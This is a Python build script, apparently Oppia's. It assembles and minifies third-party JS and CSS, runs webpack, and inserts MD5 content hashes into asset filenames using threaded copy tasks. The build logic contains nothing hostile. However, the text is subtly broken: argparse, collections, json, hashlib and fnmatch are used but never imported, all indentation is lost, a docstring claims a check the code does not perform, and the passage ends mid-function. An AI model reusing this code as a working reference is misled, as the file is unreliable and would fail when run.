import os
import re
import shutil
import subprocess
import threading
import python_utils
from scripts import common
ASSETS_DEV_DIR = os.path.join('assets', '')
ASSETS_OUT_DIR = os.path.join('build', 'assets', '')
THIRD_PARTY_STATIC_DIR = os.path.join('third_party', 'static')
THIRD_PARTY_GENERATED_DEV_DIR = os.path.join('third_party', 'generated', '')
THIRD_PARTY_GENERATED_OUT_DIR = os.path.join(
'build', 'third_party', 'generated', '')
THIRD_PARTY_JS_RELATIVE_FILEPATH = os.path.join('js', 'third_party.js')
MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH = os.path.join(
'js', 'third_party.min.js')
THIRD_PARTY_CSS_RELATIVE_FILEPATH = os.path.join('css', 'third_party.css')
MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH = os.path.join(
'css', 'third_party.min.css')
WEBFONTS_RELATIVE_DIRECTORY_PATH = os.path.join('webfonts', '')
EXTENSIONS_DIRNAMES_TO_DIRPATHS = {
'dev_dir': os.path.join('extensions', ''),
'staging_dir': os.path.join('backend_prod_files', 'extensions', ''),
'out_dir': os.path.join('build', 'extensions', '')
}
TEMPLATES_DEV_DIR = os.path.join('templates', 'dev', 'head', '')
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS = {
'dev_dir': os.path.join('core', 'templates', 'dev', 'head', ''),
'staging_dir': os.path.join('backend_prod_files', 'templates', 'head', ''),
'out_dir': os.path.join('build', 'templates', 'head', '')
}
WEBPACK_DIRNAMES_TO_DIRPATHS = {
'staging_dir': os.path.join('backend_prod_files', 'webpack_bundles', ''),
'out_dir': os.path.join('build', 'webpack_bundles', '')
}
# This json file contains a json object. The object's keys are file paths and
# the values are the corresponding hash values. The paths need to be in posix
# style, as they are interpreted by the `url-interpolation` service, which
# interprets the paths in this file as URLs.
HASHES_JSON_FILENAME = 'hashes.json'
HASHES_JSON_FILEPATH = os.path.join('assets', HASHES_JSON_FILENAME)
MANIFEST_FILE_PATH = os.path.join('manifest.json')
REMOVE_WS = re.compile(r'\s{2,}').sub
YUICOMPRESSOR_DIR = os.path.join(
os.pardir, 'oppia_tools', 'yuicompressor-2.4.8', 'yuicompressor-2.4.8.jar')
PARENT_DIR = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
UGLIFY_FILE = os.path.join('node_modules', 'uglify-js', 'bin', 'uglifyjs')
WEBPACK_FILE = os.path.join('node_modules', 'webpack', 'bin', 'webpack.js')
WEBPACK_PROD_CONFIG = 'webpack.prod.config.ts'
# Files with these extensions shouldn't be moved to the build directory.
FILE_EXTENSIONS_TO_IGNORE = ('.py', '.pyc', '.stylelintrc', '.ts')
# Files with these name patterns shouldn't be moved to the build directory,
# and will not be served in production. (This includes protractor.js files
# in /extensions.)
JS_FILENAME_SUFFIXES_TO_IGNORE = ('Spec.js', 'protractor.js')
JS_FILENAME_SUFFIXES_NOT_TO_MINIFY = ('.bundle.js',)
GENERAL_FILENAMES_TO_IGNORE = ('.pyc', '.stylelintrc', '.DS_Store')
JS_FILEPATHS_NOT_TO_BUILD = (
os.path.join(
'core', 'templates', 'dev', 'head', 'expressions',
'expression-parser.service.js'),
os.path.join('extensions', 'ckeditor_plugins', 'pre', 'plugin.js')
)
# These filepaths shouldn't be renamed (i.e. the filepath shouldn't contain a
# hash).
# This is because these files don't need cache invalidation, are referenced
# from third party files, or should not be moved to the build directory.
# Statically served pages from app.yaml should be here too, since they don't
# need cache invalidation.
FILEPATHS_NOT_TO_RENAME = (
'*.py',
'third_party/generated/js/third_party.min.js.map',
'third_party/generated/webfonts/*',
'*.bundle.js',
'*.bundle.js.map',
'webpack_bundles/about-page.mainpage.html',
'webpack_bundles/contact-page.mainpage.html',
'webpack_bundles/donate-page.mainpage.html',
'webpack_bundles/get-started-page.mainpage.html',
'webpack_bundles/privacy-page.mainpage.html',
'webpack_bundles/splash-page.mainpage.html',
'webpack_bundles/teach-page.mainpage.html',
'webpack_bundles/terms-page.mainpage.html',
'webpack_bundles/thanks-page.mainpage.html')
# Hashes for files with these paths should be provided to the frontend in
# JS hashes object.
FILEPATHS_PROVIDED_TO_FRONTEND = (
'images/*', 'videos/*', 'i18n/*', '*_directive.html', '*.directive.html',
'*.template.html', '*.png', '*.json')
HASH_BLOCK_SIZE = 2**20
APP_DEV_YAML_FILEPATH = 'app_dev.yaml'
APP_YAML_FILEPATH = 'app.yaml'
_PARSER = argparse.ArgumentParser(description="""
Creates a third-party directory where all the JS and CSS dependencies are
built and stored. Depending on the options passed to the script, might also
minify third-party libraries and/or generate a build directory.
""")
_PARSER.add_argument(
'--prod_env', action='store_true', default=False, dest='prod_mode')
_PARSER.add_argument(
'--minify_third_party_libs_only', action='store_true', default=False,
dest='minify_third_party_libs_only')
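# Hedged usage sketch (the module path below is an assumption; the flags are
# the ones registered above):
#     python -m scripts.build
#     python -m scripts.build --prod_env
#     python -m scripts.build --prod_env --minify_third_party_libs_only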
def generate_app_yaml(is_prod_mode=False):
"""Generate app.yaml from app_dev.yaml.
Args:
is_prod_mode: bool. Whether the script is being called
with --prod_env flag or not.
"""
prod_file_prefix = 'build/'
content = '# THIS FILE IS AUTOGENERATED, DO NOT MODIFY\n'
with python_utils.open_file(APP_DEV_YAML_FILEPATH, 'r') as yaml_file:
content += yaml_file.read()
for file_path in FILEPATHS_NOT_TO_RENAME:
if 'webpack_bundles/' in file_path:
content = content.replace(
file_path,
prod_file_prefix + file_path)
if not is_prod_mode:
content = content.replace('version: default', '')
if os.path.isfile(APP_YAML_FILEPATH):
os.remove(APP_YAML_FILEPATH)
with python_utils.open_file(APP_YAML_FILEPATH, 'w+') as prod_yaml_file:
prod_yaml_file.write(content)
def _minify(source_path, target_path):
"""Runs the given file through a minifier and outputs it to target_path.
Args:
source_path: str. Absolute path to file to be minified.
target_path: str. Absolute path to location where to copy
the minified file.
"""
# The -Xmxn argument is an attempt to limit the max memory used when the
# minification process is running on CircleCI. Note that, from local
# experiments, 18m seems to work, but 12m is too small and results in an
# out-of-memory error.
# https://circleci.com/blog/how-to-handle-java-oom-errors/
# Use relative path to avoid java command line parameter parse error on
# Windows. Convert to posix style path because the java program requires
# the filepath arguments to be in posix path style.
target_path = common.convert_to_posixpath(
os.path.relpath(target_path))
source_path = common.convert_to_posixpath(
os.path.relpath(source_path))
yuicompressor_dir = common.convert_to_posixpath(YUICOMPRESSOR_DIR)
cmd = 'java -Xmx24m -jar %s -o %s %s' % (
yuicompressor_dir, target_path, source_path)
subprocess.check_call(cmd, shell=True)
def write_to_file_stream(file_stream, content):
"""Write to a file object using provided content.
Args:
file_stream: file. A stream handling object to do write operation on.
content: str. String content to write to file object.
"""
file_stream.write(python_utils.UNICODE(content))
def _join_files(source_paths, target_file_stream):
"""Writes multiple files into one file.
Args:
source_paths: list(str). Paths to files to join together.
target_file_stream: file. A stream object of target file.
"""
for source_path in source_paths:
with python_utils.open_file(source_path, 'r') as source_file:
write_to_file_stream(target_file_stream, source_file.read())
def _minify_and_create_sourcemap(source_path, target_file_path):
"""Minifies and generates source map for a JS file. This function is only
meant to be used with third_party.min.js.
Args:
source_path: str. Path to JS file to minify.
target_file_path: str. Path to location of the minified file.
"""
python_utils.PRINT('Minifying and creating sourcemap for %s' % source_path)
source_map_properties = 'includeSources,url=\'third_party.min.js.map\''
cmd = '%s %s %s -c -m --source-map %s -o %s ' % (
common.NODE_BIN_PATH, UGLIFY_FILE, source_path,
source_map_properties, target_file_path)
subprocess.check_call(cmd, shell=True)
def _generate_copy_tasks_for_fonts(source_paths, target_path):
"""Queue up a copy task for each font file.
Args:
source_paths: list(str). Paths to fonts.
target_path: str. Path where the fonts should be copied.
Returns:
deque(Thread). A deque that contains all copy tasks queued
to be processed.
"""
copy_tasks = collections.deque()
for font_path in source_paths:
copy_task = threading.Thread(
target=shutil.copy,
args=(font_path, target_path,))
copy_tasks.append(copy_task)
return copy_tasks
def _insert_hash(filepath, file_hash):
"""Inserts hash into filepath before the file extension.
Args:
filepath: str. Path where the hash should be inserted.
file_hash: str. Hash to be inserted into the path.
Returns:
str. Filepath with hash inserted.
"""
filepath, file_extension = os.path.splitext(filepath)
return '%s.%s%s' % (filepath, file_hash, file_extension)
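# A minimal illustration of _insert_hash (the hash value is made up): only the
# final extension is split off by os.path.splitext, so
#     _insert_hash('css/oppia.css', '240933e7564bd72a4dde42ee23260c5f')
# returns 'css/oppia.240933e7564bd72a4dde42ee23260c5f.css', and a path like
# 'a.bundle.js' would become 'a.bundle.<hash>.js'.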
def ensure_directory_exists(filepath):
"""Ensures if directory tree exists, if not creates the directories.
Args:
filepath: str. Path to file located in directory that we want to
ensure exists.
"""
directory = os.path.dirname(filepath)
if not os.path.exists(directory):
os.makedirs(directory)
def safe_delete_directory_tree(directory_path):
"""Recursively delete a directory tree. If directory tree does not exist,
create the directories first then delete the directory tree.
Args:
directory_path: str. Directory path to be deleted.
"""
ensure_directory_exists(directory_path)
shutil.rmtree(directory_path)
def _ensure_files_exist(filepaths):
"""Ensures that files exist at the given filepaths.
Args:
filepaths: list(str). Paths to files that we want to ensure exist.
Raises:
OSError: One or more of the files does not exist.
"""
for filepath in filepaths:
if not os.path.isfile(filepath):
raise OSError('File %s does not exist.' % filepath)
def safe_copy_file(source_filepath, target_filepath):
"""Copy a file (no metadata) after ensuring the file exists at the given
source filepath.
NOTE: shutil.copyfile does not accept directory paths as arguments.
Args:
source_filepath: str. Path to source file that we want to copy from.
target_filepath: str. Path to target file that we want to copy to.
"""
_ensure_files_exist([source_filepath])
shutil.copyfile(source_filepath, target_filepath)
def safe_delete_file(filepath):
"""Delete a file after ensuring the provided file actually exists.
Args:
filepath: str. Filepath to be deleted.
"""
_ensure_files_exist([filepath])
os.remove(filepath)
def get_file_count(directory_path):
"""Count total number of file in the given directory, ignoring any files
with extensions in FILE_EXTENSIONS_TO_IGNORE or files that should not be
built.
Args:
directory_path: str. Directory to be walked.
Returns:
int. Total number of files minus ignored files.
"""
total_file_count = 0
for root, _, filenames in os.walk(directory_path):
for filename in filenames:
# Ignore files with certain extensions.
filepath = os.path.join(root, filename)
if should_file_be_built(filepath) and not any(
filename.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
total_file_count += 1
return total_file_count
def _compare_file_count(
first_dir_list, second_dir_list):
"""Ensure that the total count of files in all directories in the first
list matches the count of files in all the directories in the second list.
Args:
first_dir_list: list(str). List of directories to compare.
second_dir_list: list(str). List of directories to compare.
Raises:
ValueError: The source directory list does not have the same file
count as the target directory list.
"""
file_counts = [0, 0]
for first_dir_path in first_dir_list:
file_counts[0] += get_file_count(first_dir_path)
for second_dir_path in second_dir_list:
file_counts[1] += get_file_count(second_dir_path)
if file_counts[0] != file_counts[1]:
python_utils.PRINT(
'Comparing %s vs %s' % (first_dir_list, second_dir_list))
raise ValueError(
'%s files in first dir list != %s files in second dir list' % (
file_counts[0], file_counts[1]))
def process_html(source_file_stream, target_file_stream):
"""Remove whitespaces and add hashes to filepaths in the HTML file stream
object.
Args:
source_file_stream: file. The stream object of the HTML file to be
read from.
target_file_stream: file. The stream object to write the minified HTML
file to.
"""
write_to_file_stream(
target_file_stream, REMOVE_WS(' ', source_file_stream.read()))
def get_dependency_directory(dependency):
"""Get dependency directory from dependency dictionary.
Args:
dependency: dict(str, str). Dictionary representing single dependency
from manifest.json.
Returns:
str. Dependency directory.
"""
if 'targetDir' in dependency:
dependency_dir = dependency['targetDir']
else:
dependency_dir = dependency['targetDirPrefix'] + dependency['version']
return os.path.join(THIRD_PARTY_STATIC_DIR, dependency_dir)
def get_css_filepaths(dependency_bundle, dependency_dir):
"""Gets dependency css filepaths.
Args:
dependency_bundle: dict(str, list(str) | str). The dict has three keys:
- 'js': List of paths to js files that need to be copied.
- 'css': List of paths to css files that need to be copied.
- 'fontsPath': Path to folder containing fonts that need to be
copied.
dependency_dir: str. Path to directory where the files that need to
be copied are located.
Returns:
list(str). List of paths to css files that need to be copied.
"""
css_files = dependency_bundle.get('css', [])
return [os.path.join(dependency_dir, css_file) for css_file in css_files]
def get_js_filepaths(dependency_bundle, dependency_dir):
"""Gets dependency js filepaths.
Args:
dependency_bundle: dict(str, list(str) | str). The dict has three keys:
- 'js': List of paths to js files that need to be copied.
- 'css': List of paths to css files that need to be copied.
- 'fontsPath': Path to folder containing fonts that need to be
copied.
dependency_dir: str. Path to directory where the files that need to
be copied are located.
Returns:
list(str). List of paths to js files that need to be copied.
"""
js_files = dependency_bundle.get('js', [])
return [os.path.join(dependency_dir, js_file) for js_file in js_files]
def get_font_filepaths(dependency_bundle, dependency_dir):
"""Gets dependency font filepaths.
Args:
dependency_bundle: dict(str, list(str) | str). The dict has three keys:
- 'js': List of paths to js files that need to be copied.
- 'css': List of paths to css files that need to be copied.
- 'fontsPath': Path to folder containing fonts that need to be
copied.
dependency_dir: str. Path to directory where the files that need to
be copied are located.
Returns:
list(str). List of paths to font files that need to be copied.
"""
if 'fontsPath' not in dependency_bundle:
# Skip dependency bundles in manifest.json that do not have
# fontsPath property.
return []
fonts_path = dependency_bundle['fontsPath']
# Obtain directory path to /font inside dependency folder.
# E.g. third_party/static/bootstrap-3.3.4/fonts/.
font_dir = os.path.join(dependency_dir, fonts_path)
font_filepaths = []
# Walk the directory and add all font files to list.
for root, _, filenames in os.walk(font_dir):
for filename in filenames:
font_filepaths.append(os.path.join(root, filename))
return font_filepaths
def get_dependencies_filepaths():
"""Extracts dependencies filepaths from manifest.json file into
a dictionary.
Returns:
dict(str, list(str)). A dict mapping file types to lists of filepaths.
The dict has three keys: 'js', 'css' and 'fonts'. Each of the
corresponding values is a full list of dependency file paths of the
given type.
"""
filepaths = {
'js': [],
'css': [],
'fonts': []
}
with python_utils.open_file(MANIFEST_FILE_PATH, 'r') as json_file:
manifest = json.loads(
json_file.read(), object_pairs_hook=collections.OrderedDict)
frontend_dependencies = manifest['dependencies']['frontend']
for dependency in frontend_dependencies.values():
if 'bundle' in dependency:
dependency_dir = get_dependency_directory(dependency)
filepaths['css'].extend(
get_css_filepaths(dependency['bundle'], dependency_dir))
filepaths['js'].extend(
get_js_filepaths(dependency['bundle'], dependency_dir))
filepaths['fonts'].extend(
get_font_filepaths(dependency['bundle'], dependency_dir))
_ensure_files_exist(filepaths['js'])
_ensure_files_exist(filepaths['css'])
_ensure_files_exist(filepaths['fonts'])
return filepaths
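# Illustrative manifest.json shape consumed above (the dependency name and
# values are hypothetical; entries without a 'bundle' key are skipped and
# 'fontsPath' is optional):
#     {"dependencies": {"frontend": {
#         "jquery": {"version": "3.4.1", "targetDirPrefix": "jquery-",
#                    "bundle": {"js": ["jquery.min.js"]}}}}}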
def minify_third_party_libs(third_party_directory_path):
"""Minify third_party.js and third_party.css and remove un-minified
files.
"""
THIRD_PARTY_JS_FILEPATH = os.path.join(
third_party_directory_path, THIRD_PARTY_JS_RELATIVE_FILEPATH)
THIRD_PARTY_CSS_FILEPATH = os.path.join(
third_party_directory_path, THIRD_PARTY_CSS_RELATIVE_FILEPATH)
MINIFIED_THIRD_PARTY_JS_FILEPATH = os.path.join(
third_party_directory_path, MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH)
MINIFIED_THIRD_PARTY_CSS_FILEPATH = os.path.join(
third_party_directory_path, MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH)
_minify_and_create_sourcemap(
THIRD_PARTY_JS_FILEPATH, MINIFIED_THIRD_PARTY_JS_FILEPATH)
_minify(THIRD_PARTY_CSS_FILEPATH, MINIFIED_THIRD_PARTY_CSS_FILEPATH)
# Clean up un-minified third_party.js and third_party.css.
safe_delete_file(THIRD_PARTY_JS_FILEPATH)
safe_delete_file(THIRD_PARTY_CSS_FILEPATH)
def build_third_party_libs(third_party_directory_path):
"""Joins all third party css files into single css file and js files into
single js file. Copies both files and all fonts into third party folder.
"""
python_utils.PRINT(
'Building third party libs at %s' % third_party_directory_path)
THIRD_PARTY_JS_FILEPATH = os.path.join(
third_party_directory_path, THIRD_PARTY_JS_RELATIVE_FILEPATH)
THIRD_PARTY_CSS_FILEPATH = os.path.join(
third_party_directory_path, THIRD_PARTY_CSS_RELATIVE_FILEPATH)
WEBFONTS_DIR = os.path.join(
third_party_directory_path, WEBFONTS_RELATIVE_DIRECTORY_PATH)
dependency_filepaths = get_dependencies_filepaths()
ensure_directory_exists(THIRD_PARTY_JS_FILEPATH)
with python_utils.open_file(
THIRD_PARTY_JS_FILEPATH, 'w+') as third_party_js_file:
_join_files(dependency_filepaths['js'], third_party_js_file)
ensure_directory_exists(THIRD_PARTY_CSS_FILEPATH)
with python_utils.open_file(
THIRD_PARTY_CSS_FILEPATH, 'w+') as third_party_css_file:
_join_files(dependency_filepaths['css'], third_party_css_file)
ensure_directory_exists(WEBFONTS_DIR)
_execute_tasks(
_generate_copy_tasks_for_fonts(
dependency_filepaths['fonts'], WEBFONTS_DIR))
def build_using_webpack():
"""Execute webpack build process. This takes all TypeScript files we have in
/templates/dev/head and generates JS bundles according to the require() imports
and also compiles HTML pages into the /backend_prod_files/webpack_bundles
folder. The files are later copied into /build/webpack_bundles.
The settings for this are specified in webpack.prod.config.ts.
"""
python_utils.PRINT('Building webpack')
cmd = '%s %s --config %s' % (
common.NODE_BIN_PATH, WEBPACK_FILE, WEBPACK_PROD_CONFIG)
subprocess.check_call(cmd, shell=True)
def hash_should_be_inserted(filepath):
"""Returns if the file should be renamed to include hash in
the path.
Args:
filepath: str. Path relative to directory we are currently building.
Returns:
bool. True if filepath should contain hash else False.
"""
return not any(fnmatch.fnmatch(filepath, pattern) for pattern
in FILEPATHS_NOT_TO_RENAME)
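# Hedged example of the fnmatch check above (paths are hypothetical):
#     hash_should_be_inserted('scripts/run.py')    -> False ('*.py' matches)
#     hash_should_be_inserted('images/logo.svg')   -> True  (no pattern matches)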
def should_file_be_built(filepath):
"""Determines if the file should be built.
- JS files: Returns False if filepath matches with pattern in
JS_FILENAME_SUFFIXES_TO_IGNORE or is in JS_FILEPATHS_NOT_TO_BUILD,
else returns True.
- Python files: Returns False if filepath ends with _test.py, else
returns True
- TS files: Returns False.
- Other files: Returns False if filepath matches with pattern in
GENERAL_FILENAMES_TO_IGNORE, else returns True.
Args:
filepath: str. Path of the file, relative to the directory we are
currently building.
Returns:
bool. True if filepath should be built, else False.
"""
if filepath.endswith('.js'):
return all(
not filepath.endswith(p) for p in JS_FILENAME_SUFFIXES_TO_IGNORE)
elif filepath.endswith('_test.py'):
return False
elif filepath.endswith('.ts'):
return False
else:
return not any(
filepath.endswith(p) for p in GENERAL_FILENAMES_TO_IGNORE)
def generate_copy_tasks_to_copy_from_source_to_target(
source, target, file_hashes):
"""Generate copy task for each file in source directory, excluding files
with extensions in FILE_EXTENSIONS_TO_IGNORE. Insert hash from hash dict
into the destination filename.
Args:
source: str. Path relative to /oppia directory of directory
containing files and directories to be copied.
target: str. Path relative to /oppia directory of directory where
to copy the files and directories.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
deque(Thread). A deque that contains all copy tasks queued
to be processed.
"""
python_utils.PRINT('Processing %s' % os.path.join(os.getcwd(), source))
python_utils.PRINT('Copying into %s' % os.path.join(os.getcwd(), target))
copy_tasks = collections.deque()
for root, dirnames, filenames in os.walk(os.path.join(os.getcwd(), source)):
for directory in dirnames:
python_utils.PRINT('Copying %s' % os.path.join(root, directory))
for filename in filenames:
source_path = os.path.join(root, filename)
# Python files should not be copied to final build directory.
if not any(
source_path.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
target_path = source_path
# The path in hashes.json file is in posix style,
# see the comment above HASHES_JSON_FILENAME for details.
relative_path = common.convert_to_posixpath(
os.path.relpath(source_path, source))
if (hash_should_be_inserted(source + relative_path) and
relative_path in file_hashes):
relative_path = (
_insert_hash(relative_path, file_hashes[relative_path]))
target_path = os.path.join(os.getcwd(), target, relative_path)
ensure_directory_exists(target_path)
copy_task = threading.Thread(
target=safe_copy_file,
args=(source_path, target_path,))
copy_tasks.append(copy_task)
return copy_tasks
def is_file_hash_provided_to_frontend(filepath):
"""Returns if the hash for the filepath should be provided to the frontend.
Args:
filepath: str. Relative path to the file.
Returns:
bool. True if file hash should be provided to the frontend else False.
"""
return any(fnmatch.fnmatch(filepath, pattern) for pattern
in FILEPATHS_PROVIDED_TO_FRONTEND)
def generate_md5_hash(filepath):
"""Returns md5 hash of file.
Args:
filepath: str. Absolute path to the file.
Returns:
str. Hexadecimal hash of specified file.
"""
m = hashlib.md5()
with python_utils.open_file(filepath, 'rb', encoding=None) as f:
while True:
buf = f.read(HASH_BLOCK_SIZE)
if not buf:
break
m.update(buf)
return m.hexdigest()
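# Reading in HASH_BLOCK_SIZE (2**20 byte) chunks keeps memory use bounded for
# large binary assets. Illustrative call (path and digest are made up):
#     generate_md5_hash('assets/images/logo.png')
#     -> '240933e7564bd72a4dde42ee23260c5f'  (32 hex characters)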
def get_filepaths_by_extensions(source_dir, file_extensions):
"""Return list of filepaths in a directory with certain extensions,
excluding filepaths that should not be built.
Args:
source_dir: str. Root directory to be walked.
file_extensions: tuple(str). Tuple of file extensions.
Returns:
list(str). List of filepaths with specified extensions.
"""
filepaths = []
for root, _, filenames in os.walk(source_dir):
for filename in filenames:
filepath = os.path.join(root, filename)
relative_filepath = os.path.relpath(filepath, source_dir)
if should_file_be_built(filepath) and any(
filename.endswith(p) for p in file_extensions):
filepaths.append(relative_filepath)
return filepaths
def get_file_hashes(directory_path):
"""Returns hashes of all files in directory tree, excluding files with
extensions in FILE_EXTENSIONS_TO_IGNORE or files that should not be built.
Args:
directory_path: str. Root directory of the tree.
Returns:
dict(str, str). Dictionary with keys specifying file paths and values
specifying file hashes.
"""
file_hashes = dict()
python_utils.PRINT(
'Computing hashes for files in %s'
% os.path.join(os.getcwd(), directory_path))
for root, _, filenames in os.walk(
os.path.join(os.getcwd(), directory_path)):
for filename in filenames:
filepath = os.path.join(root, filename)
if should_file_be_built(filepath) and not any(
filename.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
# The path in hashes.json file is in posix style,
# see the comment above HASHES_JSON_FILENAME for details.
complete_filepath = common.convert_to_posixpath(
os.path.join(root, filename))
relative_filepath = common.convert_to_posixpath(os.path.relpath(
complete_filepath, directory_path))
file_hashes[relative_filepath] = generate_md5_hash(
complete_filepath)
return file_hashes
def filter_hashes(file_hashes):
"""Filters hashes that should be provided to the frontend
and prefixes "/" in front of the keys.
Args:
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
dict(str, str). Filtered dictionary of only filepaths that should be
provided to the frontend.
"""
filtered_hashes = dict()
for filepath, file_hash in file_hashes.items():
if is_file_hash_provided_to_frontend(filepath):
filtered_hashes['/' + filepath] = file_hash
return filtered_hashes
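# A minimal sketch of filter_hashes (hash values are made up): given
#     {'images/logo.png': 'abc123', 'scripts/run.py': 'def456'}
# it returns {'/images/logo.png': 'abc123'}, since 'images/*' (and '*.png')
# is in FILEPATHS_PROVIDED_TO_FRONTEND while no pattern matches the .py path.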
def save_hashes_to_file(file_hashes):
"""Return JS code that loads hashes needed for frontend into variable.
Args:
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
str. JS code loading hashes as JSON into variable.
"""
# Only some of the hashes are needed in the frontend.
filtered_hashes = filter_hashes(file_hashes)
ensure_directory_exists(HASHES_JSON_FILEPATH)
with python_utils.open_file(HASHES_JSON_FILEPATH, 'w+') as hashes_json_file:
hashes_json_file.write(
python_utils.UNICODE(
json.dumps(filtered_hashes, ensure_ascii=False)))
hashes_json_file.write(u'\n')
def minify_func(source_path, target_path, filename):
"""Call the appropriate functions to handle different types of file
formats:
- HTML files: Remove extra whitespace and save the edited file at the
target directory.
- CSS or JS files: Minify and save at target directory.
- Other files: Copy the file from source directory to target directory.
"""
skip_minify = any(
filename.endswith(p) for p in JS_FILENAME_SUFFIXES_NOT_TO_MINIFY)
if filename.endswith('.html'):
python_utils.PRINT('Building %s' % source_path)
with python_utils.open_file(source_path, 'r+') as source_html_file:
with python_utils.open_file(
target_path, 'w+') as minified_html_file:
process_html(source_html_file, minified_html_file)
elif ((filename.endswith('.css') or filename.endswith('.js')) and
not skip_minify):
python_utils.PRINT('Minifying %s' % source_path)
_minify(source_path, target_path)
else:
python_utils.PRINT('Copying %s' % source_path)
safe_copy_file(source_path, target_path)
def _execute_tasks(tasks, batch_size=24):
"""Starts all tasks and checks the results.
Runs no more than 'batch_size' tasks at a time.
"""
remaining_tasks = collections.deque(tasks)
currently_running_tasks = []
while remaining_tasks or currently_running_tasks:
if currently_running_tasks:
for task in collections.deque(currently_running_tasks):
if not task.is_alive():
currently_running_tasks.remove(task)
while remaining_tasks and len(currently_running_tasks) < batch_size:
task = remaining_tasks.popleft()
currently_running_tasks.append(task)
try:
task.start()
except RuntimeError:
raise OSError('threads can only be started once')
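# Hedged usage sketch: threading.Thread objects are single-use, so callers
# must pass freshly constructed, unstarted threads ('pairs' is hypothetical):
#     tasks = collections.deque(
#         threading.Thread(target=safe_copy_file, args=(src, dst))
#         for src, dst in pairs)
#     _execute_tasks(tasks, batch_size=8)
# Re-submitting an already-started thread raises the OSError above.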
def generate_build_tasks_to_build_all_files_in_directory(source, target):
"""This function queues up tasks to build all files in a directory,
excluding files that should not be built.
Args:
source: str. Path relative to /oppia of directory containing source
files and directories to be built.
target: str. Path relative to /oppia of directory where the built files
and directories will be saved to.
Returns:
deque(Thread). A deque that contains all build tasks queued
to be processed.
"""
python_utils.PRINT('Processing %s' % os.path.join(os.getcwd(), source))
python_utils.PRINT('Generating into %s' % os.path.join(os.getcwd(), target))
build_tasks = collections.deque()
for root, dirnames, filenames in os.walk(os.path.join(os.getcwd(), source)):
for directory in dirnames:
python_utils.PRINT(
'Building directory %s' % os.path.join(root, directory))
for filename in filenames:
source_path = os.path.join(root, filename)
target_path = source_path.replace(source, target)
ensure_directory_exists(target_path)
if should_file_be_built(source_path):
task = threading.Thread(
target=minify_func,
args=(source_path, target_path, filename,))
build_tasks.append(task)
return build_tasks
def generate_build_tasks_to_build_files_from_filepaths(
source_path, target_path, filepaths):
"""This function queues up build tasks to build files from a list of
filepaths, excluding files that should not be built.
Args:
source_path: str. Path relative to /oppia directory of directory
containing files and directories to be copied.
target_path: str. Path relative to /oppia directory of directory where
to copy the files and directories.
filepaths: list(str). List of filepaths to be built.
Returns:
deque(Thread). A deque that contains all build tasks queued
to be processed.
"""
build_tasks = collections.deque()
for filepath in filepaths:
source_file_path = os.path.join(source_path, filepath)
target_file_path = os.path.join(target_path, filepath)
ensure_directory_exists(target_file_path)
if should_file_be_built(source_file_path):
task = threading.Thread(
target=minify_func,
args=(
source_file_path, target_file_path, filepath,))
build_tasks.append(task)
return build_tasks
def generate_delete_tasks_to_remove_deleted_files(
source_dir_hashes, staging_directory):
"""This function walks the staging directory and queues up deletion tasks to
remove files that are not in the hash dict, i.e. files remaining in the
staging directory that have since been deleted from the source directory. Files with
extensions in FILE_EXTENSIONS_TO_IGNORE will be excluded.
Args:
source_dir_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
staging_directory: str. Path relative to /oppia directory of directory
containing files and directories to be walked.
Returns:
deque(Thread). A deque that contains all delete tasks
queued to be processed.
"""
python_utils.PRINT(
'Scanning directory %s to remove deleted files' % staging_directory)
delete_tasks = collections.deque()
for root, _, filenames in os.walk(
os.path.join(os.getcwd(), staging_directory)):
for filename in filenames:
target_path = os.path.join(root, filename)
# Ignore files with certain extensions.
if not any(
target_path.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
# On Windows the path is in Windows style, while the paths in the
# hash dict are in posix style; convert it so the check
# can run correctly.
relative_path = common.convert_to_posixpath(
os.path.relpath(target_path, staging_directory))
# Remove file found in staging directory but not in source
# directory, i.e. file not listed in hash dict.
if relative_path not in source_dir_hashes:
python_utils.PRINT(
'Unable to find %s in file hashes, deleting file'
% target_path)
task = threading.Thread(
target=safe_delete_file, args=(target_path,))
delete_tasks.append(task)
return delete_tasks
def get_recently_changed_filenames(source_dir_hashes, out_dir):
"""Compare hashes of source files and built files. Return a list of
filenames that were recently changed. Skips files that are not supposed to
be built or are already built.
Args:
source_dir_hashes: dict(str, str). Dictionary of hashes of files
to be built.
out_dir: str. Path relative to /oppia where built files are located.
Returns:
list(str). List of filenames expected to be re-hashed.
"""
# Hashes are created based on files' contents and are inserted between
# the filenames and their extensions,
# e.g. base.240933e7564bd72a4dde42ee23260c5f.html.
# If a file gets edited, a different MD5 hash is generated.
recently_changed_filenames = []
# Currently, Python files and HTML files are always re-built.
FILE_EXTENSIONS_NOT_TO_TRACK = ('.html', '.py',)
for filename, md5_hash in source_dir_hashes.items():
# Skip files that are already built or should not be built.
if should_file_be_built(filename) and not any(
filename.endswith(p) for p in FILE_EXTENSIONS_NOT_TO_TRACK):
final_filepath = _insert_hash(
os.path.join(out_dir, filename), md5_hash)
if not os.path.isfile(final_filepath):
# A filename with the provided hash cannot be found; this file has
# been changed or created since the last build.
recently_changed_filenames.append(filename)
if recently_changed_filenames:
python_utils.PRINT(
'The following files will be rebuilt due to recent changes: %s'
% recently_changed_filenames)
return recently_changed_filenames
def generate_build_tasks_to_build_directory(dirnames_dict):
"""This function queues up build tasks to build all files in source
directory if there is no existing staging directory. Otherwise, selectively
queue up build tasks to build recently changed files.
Args:
dirnames_dict: dict(str, str). This dict should contain three keys,
with corresponding values as follows:
- 'dev_dir': the directory that contains source files to be built.
- 'staging_dir': the directory that contains minified files waiting
for final copy process.
- 'out_dir': the final directory that contains built files with hash
inserted into filenames.
Returns:
deque(Thread). A deque that contains all build tasks queued
to be processed.
"""
source_dir = dirnames_dict['dev_dir']
staging_dir = dirnames_dict['staging_dir']
out_dir = dirnames_dict['out_dir']
build_tasks = collections.deque()
